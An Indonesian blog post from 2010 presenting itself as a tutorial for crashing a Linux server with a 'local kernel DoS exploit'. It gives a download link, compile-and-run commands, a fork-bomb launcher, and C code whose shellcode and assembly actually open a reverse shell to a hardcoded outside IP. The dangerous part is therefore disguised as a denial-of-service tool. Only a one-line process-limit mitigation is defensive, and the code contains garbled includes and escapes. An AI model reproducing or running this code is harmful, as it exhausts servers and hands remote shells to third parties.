Twitter

Cara DDOS 1 Server dengan Exploit

Diposting oleh Touya Blog on

Maros- Sebelum membahas, saya mau ucapkan Selamat Buat Jasakom yang telah Ganti Web dan Ganti template dengan database yang sama. kemarin saya mencoba masuk kembali Komunitas Jasakom untuk melihat Perubahan dan melihat perkembangan dari komunitas underground yang cukup besar di tanah air ini. tidak sengaja saya melihat sebuah postingan dari Sang Suhu Mywisdom tentang melakukan DDOS pada Server Site target, syarat: server web harus socket enabled.
anda bisa mendownload di sini : http://yoyoparty.com/upload/angela.tgz
 cara penggunaan software ini :

 untuk melakukan berulang-ulang

gcc -o angela angela.c
./angela &
 atau bisa juga seperti ini :
gcc -o angela angela.c
./angela


source filename dybxkill.c

//Local Kernel 2.6.x Denial of Service Exploit with socket enabled
//C0d3r: mywisdom ( murder of odybx and cyber tank )
//thanks: all jasakom crew, all devilzc0de crew, all ycl crew
//special thanks: gunslinger,peneter, peti mati, v3n0m,flyv666,7460,cyber mutaqqin and so on.
#include 
#include 
void peneter()
 {
 printf("\nOdybx Was Killed version 1.0 local kernel 2.6 dos sploit");
printf("\nFree provided by mywisdom creator of kiss of death technic\n");     
 printf("\nTrying to kill this server in minutes..please wait \n");     
 }     
 void xxx()
  {
   char esc = 27;
   printf("%c%s",esc,"[2J");
   printf("%c%s",esc,"[1;1H");
        
  }

void v3n0m()
 {
char socketz[] ="\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\"
"\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x68\"
"\x7c\x52\x9a\x79\x66\x68\x1a\x0b\"
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\"
"\x89\xe1\x89\xc6\x6a\x03\x5b\x6a\x66\x58"
"\xcd\x80\"
"\xbb\xb8\x01\xcd\x80";
        (*(void (*)()) socketz)();

 }     
 
void gunslinger()
      {
     __asm__ ("push   $0x66    \n\t"
"pop    %eax\n\t"
"push   $0x1\n\t"
"pop    %ebx\n\t"
"xor    %ecx,%ecx\n\t"
"push   %ecx\n\t"
"push   $0x1\n\t"
"push   $0x2\n\t"
"mov    %esp,%ecx\n\t"
"int    $0x80\n\t"
"push   $0x799a527c\n\t"
"pushw  $0x0b1a\n\t"
"pushw  $0x2\n\t"
"mov    %esp,%ecx\n\t"
"push   $0x10\n\t"
"push   %ecx\n\t"
"push   %eax\n\t"
"mov    %esp,%ecx\n\t"
"mov    %eax,%esi\n\t"
"push   $0x3\n\t"
"pop    %ebx\n\t"
"push   $0x66\n\t"
"pop    %eax\n\t"
"int    $0x80    \n\t"
"xchg   %esi,%ebx\n\t"
"push   $0x2\n\t"
"pop    %ecx\n\t"
"dup_loop:\n\t"
"mov    $0x3f,%al\n\t"
"int    $0x80\n\t"
"dec    %ecx\n\t"
"jns    dup_loop\n\t"
"mov    $0xb,%al\n\t"
"xor    %edx,%edx\n\t"
"push   %edx\n\t"
"push   $0x68732f2f\n\t"
"push   $0x6e69622f\n\t"
"mov    %esp,%ebx\n\t"
"push   %edx\n\t"
"push   %ebx\n\t"
"mov    %esp, %ecx\n\t"
"int    $0x80\n\t"
);

}

int main()
 { 
     xxx();
     int hack;
     int iseng;
     for (hack=1;;)
     {
        while (iseng<2)
        {
      peneter();
      v3n0m();
      gunslinger();
        }
    }
         
     return 0;
        
}

 filename: angela.c

//Local Kernel 2.6.x with socket enabled Denial of Service Exploit
//C0d3r: mywisdom ( murder of odybx and cyber tank)
//testing main loop
// what the #### of race condition
#include 
int main()
 {
int hack;
system("gcc -o odybxkill odybxkill.c");
 for(hack=1;;)
      {
       system("./odybxkill &");          
          fork();
      }      
 
 }

Telah di Test pada :
- kernel 2.6.28
- kernel 2.6.21
- kernel 2.6.24


karena berhubung ada yang pernah complain dengan serangan seperti ini (Dia Jadi Korban)

maka saya akan Posting pencegahannya.

berikut ini adalah pencegahan dari exploit ini bos:

Pencegahan:
 Agar anda aman dari serangan seperti ini, silahkan Atur di /etc/security/limits.conf
untuk max process yang bisa dijalankan oleh tiap cgi-user maupun user hosting



Thank's All... Jasakom All Crew and Member, Jumper Corp.

~ Keep reading ~

Diposting oleh Touya Blog on Minggu, 24 Januari 2010

{ 0 komentar... read them below or add one }